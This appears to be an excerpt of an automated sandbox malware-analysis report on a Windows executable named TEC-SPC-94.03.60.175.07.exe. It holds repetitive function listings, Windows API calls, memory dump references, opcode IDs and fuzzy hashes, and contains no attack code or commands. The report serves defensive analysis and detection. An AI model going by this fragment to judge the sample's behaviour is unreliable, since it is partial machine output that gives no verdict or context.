                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$PointerWrite
                                                          • String ID:
                                                          • API String ID: 539440098-0
                                                          • Opcode ID: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction ID: e0bff1d0cfda9ca41153e72f66d50dbc15cd376e58f7be5246e1248deba32b17
                                                          • Opcode Fuzzy Hash: 90118ecf7a9ba7c1b0c512c54543666c71b076bc3a218e086344a49311413f62
                                                          • Instruction Fuzzy Hash: A2315971504218EBDF20CF65ED45A9F3FB8EB08755F20807AF904EA1A0D3349E40DBA9
                                                          Function 00401F98 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FD4
                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402051
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 334405425-0
                                                          • Opcode ID: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction ID: 409458e37c45ac75b59f5eb787cb01d488d5b476e6d1706a1798d0305ac83909
                                                          • Opcode Fuzzy Hash: a8461a16ac82fd46328c3b40fe1928024aef525999e2dd49edf51c7c032d1790
                                                          • Instruction Fuzzy Hash: A221C571904215F6CF206FA5CE48ADEBAB4AB04358F70427BF610B51E0D7B98E41DA6E
                                                          Function 100028A4 Relevance: 3.2, APIs: 2, Instructions: 156COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2371509767.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.2371482983.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371555156.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.2371583755.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: EnumErrorLastWindows
                                                          • String ID:
                                                          • API String ID: 14984897-0
                                                          • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                          • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                          • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                          Function 004023E0 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 00402411
                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsrF34D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 3677997916-0
                                                          • Opcode ID: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction ID: d7ada52d2c39296e820c3ca3910a3186400bd00b77f85fef4b18c2a42e671548
                                                          • Opcode Fuzzy Hash: c32cffa1c652d0f2c9f8b1d7d2b39189a889ceb323ad23ef5d1c5f54ddf36b6e
                                                          • Instruction Fuzzy Hash: 53115171915205EEDB14CFA0C6889AFB6B4EF40359F20843FE042A72D0D6B85A41DB5A
                                                          Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                          • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction ID: 092ce593f34d4cefb17b57a654468e4a57f6b0d243feea45f1431905bdcf8400
                                                          • Opcode Fuzzy Hash: fdfb5bbf2347fc35bcb13febb1c36166d701c4f92b0c5c73d87b5da78d67bd23
                                                          • Instruction Fuzzy Hash: 6F01F431B24210ABE7295B389C05B6A3698E710314F10863FF911F62F1DA78DC13CB4D
                                                          Function 004022D5 Relevance: 3.0, APIs: 2, Instructions: 40registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00402C44: RegOpenKeyExW.KERNELBASE(00000000,000001D0,00000000,00000022,00000000,?,?), ref: 00402C6C
                                                          • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004022F4
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 004022FD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID:
                                                          • API String ID: 849931509-0
                                                          • Opcode ID: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction ID: 38b5be8bce117af921f4e5ecf87b48473febfbb911f594cd731ca38f4e60318c
                                                          • Opcode Fuzzy Hash: 4bd72c51a3dc84892fe05f41f2106d015a2bbdeef4f8939a42ccf3008d047df4
                                                          • Instruction Fuzzy Hash: 30F06272A04210ABEB15AFF59A4EBAE7278DB44318F20453BF201B71D1D5FC5D028A7D
                                                          Function 00401DC7 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DDD
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401DE8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                          • Instruction ID: 2c80559432ee8e8f64af81f0c0a70d483a1ba28b218ef0fe4a74e939514edfa0
                                                          • Opcode Fuzzy Hash: 0f4d8abf280261f43614518adab2bae4bd66ad472d4fa30d0b6c7b31f2cad2bd
                                                          • Instruction Fuzzy Hash: CEE08CB2B04104DBCB50AFF4AA889DD7378AB90369B20087BF402F10D1C2B86C009A3E
                                                          Function 00405BB4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                          • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCreate
                                                          • String ID:
                                                          • API String ID: 415043291-0
                                                          • Opcode ID: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction ID: 50e17d5b3030c5d5ce0b1439250f6e41608f831a0cbc2ce1bc41554210f96241
                                                          • Opcode Fuzzy Hash: 29e75e61bcb11788d424f4f71b5fd4206a8d95c56bb837550d9b6456a4565c05
                                                          • Instruction Fuzzy Hash: 48D09E71658201EFFF098F20DE16F2EBBA2EB84B00F10562CB656940E0D6715815DB16
                                                          Function 004026F9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 00402713
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
